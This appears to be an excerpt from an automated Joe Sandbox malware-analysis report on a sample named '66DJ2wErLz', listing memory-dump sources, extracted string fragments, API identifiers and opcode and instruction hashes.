                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                      • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                      • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                      • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                      • Instruction ID: f72b5956e0231976909696f2b6c19bc295ff433a4180b0fe597eb97b0098b894
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE1F57112D3C18BE725CF29D551BBABBD2EF92304F18896DD0D9872D2DB39840AC722
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                      • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                      • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                      • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                      • Instruction ID: ba3675094b51be9348bad994a1bc47e942ce7b32af8d3d7a5343a1ac9ff10845
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3E1D37151D3C18BE735CF2995607BBBBD6AFD2304F1888ADC1C987292DB39454ACB22
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                      • API String ID: 0-2418547040
                                                                                                                                                                                                                                                      • Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                      • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: #$$+oQ$?{;}$DF
                                                                                                                                                                                                                                                      • API String ID: 0-1090792222
                                                                                                                                                                                                                                                      • Opcode ID: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                      • Instruction ID: f8f0a3fc3e126b0df0e9da8d66218e0bc810a6f9e0fb1804998ec3192ea1b230
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34E102B4E043549FEB10DF28D942B5EBBB0FB86304F1085ADE598AB381D7758946CF86
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MetricsSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                      • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                      • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                      • API String ID: 0-483502859
                                                                                                                                                                                                                                                      • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                      • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                      • API String ID: 0-483502859
                                                                                                                                                                                                                                                      • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                      • Instruction ID: 7d4f6a0cc32571d6666afce0984d5a6fecc35dd520aeb85ecaa01452a94ad99b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13A1B4B52017818FD719CF2AC590A62BBF2FF96304B19959DC4D68F766D734E802CB50
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: -$C\$Iz$[^
                                                                                                                                                                                                                                                      • API String ID: 0-2105564891
                                                                                                                                                                                                                                                      • Opcode ID: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                      • Instruction ID: 1f428c78a3ec45b3ac06d5869d2969195f70f7a9ed71af3e2c5869e9eb0e125c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5181DEB264C3509FD308CFA9885186FFBE2EFD1300F59C86CF1E58B251D67996068B82
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: T$U$V$k
                                                                                                                                                                                                                                                      • API String ID: 0-1255220828
                                                                                                                                                                                                                                                      • Opcode ID: d7e9605b728d24d94aa6476dc2bc71a6c7b696767e3fd5b61d48fe4e4e80319c
                                                                                                                                                                                                                                                      • Instruction ID: 419b7bd8d768cf5a93220c289582c9eeb00d0d40764b4ee896287773b3a375b3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7e9605b728d24d94aa6476dc2bc71a6c7b696767e3fd5b61d48fe4e4e80319c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CA1043110C7918BD708CB38985022FBBE25BDA324F1A9B2EE4E6473D2D679C945C74B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: T$U$V$k
                                                                                                                                                                                                                                                      • API String ID: 0-1255220828
                                                                                                                                                                                                                                                      • Opcode ID: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                      • Instruction ID: 8b160811dd123b006137b9fa43615a14b2f408a7c87c4e977f4d1489f5fb9631
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04A1153260C7908FC314DB7898942AEBBE25BD6328F194B2DE4E6873D2D675C985C707
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: in~x$kmbj$ydij
                                                                                                                                                                                                                                                      • API String ID: 0-2624003027
                                                                                                                                                                                                                                                      • Opcode ID: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                      • Instruction ID: f79569228283954ad57b9a6cc496d73d61da5c1ffc761606bfa780fd5c95cafa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A91245B5600A01CFC7248F24D8D16A7BBA2FF96314F18857ED4968B396E738E842CB55
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0$V$e
                                                                                                                                                                                                                                                      • API String ID: 0-3964817793
                                                                                                                                                                                                                                                      • Opcode ID: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
                                                                                                                                                                                                                                                      • Instruction ID: 59230c03b5a3a3693ef44b30c97d38267524f76adfdce6de0efbbb4ceb4d7fde
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9822E77290C7408BD724DF38C4913AEBBD2ABD5324F194A2EE5E9973D1DA388941CB47
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0$V$e
                                                                                                                                                                                                                                                      • API String ID: 0-3964817793
                                                                                                                                                                                                                                                      • Opcode ID: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
                                                                                                                                                                                                                                                      • Instruction ID: e64c3b0c1ef3dbee01fdb65ac30180851814098fb24d74784fea4ba916f520ef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E22C73260D780CBD328DF3984953AFBBD1ABD5320F194E2DE5E9873D1D67889418B82
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                                      • API String ID: 0-2543814982
                                                                                                                                                                                                                                                      • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                      • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                      • API String ID: 0-3307990326
                                                                                                                                                                                                                                                      • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                      • Instruction ID: 2c3e85ab5c144d7314fd8b8a2605d9e263d574a9362c18afd17e886365cdf6ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A981CA716007128BC768CF29C890A77B7F2FF99710B1A859DC9824FB65EB34E842CB45
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                      • API String ID: 0-2784972518
                                                                                                                                                                                                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                      • Instruction ID: e7df28c795b5d5d6bb707880e7510df8e26bbd12ea004c9f38b556de3a969cf7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B315CB6900649DFDB11CF99C880AADBBF9FF48324F14404AD441A7352D7B5EA85CBA4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                      • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                      • API String ID: 2994545307-936430989
                                                                                                                                                                                                                                                      • Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                      • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                      • API String ID: 0-936430989
                                                                                                                                                                                                                                                      • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                      • Instruction ID: fb192f1f68a986db5534d41ada8a152577d6726496ca27dc177991babe1aa406
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 988226B46083449FD7248F24D880B7FBBE6EBD6714F28892CE69987291D771DC42CB46
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0$8
                                                                                                                                                                                                                                                      • API String ID: 0-46163386
                                                                                                                                                                                                                                                      • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                      • Instruction ID: d40c633f6dc63a9644a0400b392de52ca6438bdc0a59f23ad90aea60c423d6c9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC7213716087409FD714CF18C880BABBBE1EB88314F04892EF9899B391D379D948DF96
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 0$8
                                                                                                                                                                                                                                                      • API String ID: 0-46163386
                                                                                                                                                                                                                                                      • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                      • Instruction ID: 0ec0e3d7411b8b0beb6f6f720d38af04a08158ab4c872c42d0a5f3b4f1cef70f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B37257716087809FD715CF19C880BABBBE1AF98318F05892DF9998B391D375DD48CB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Uninitialize
                                                                                                                                                                                                                                                      • String ID: PT
                                                                                                                                                                                                                                                      • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                      • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                      • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
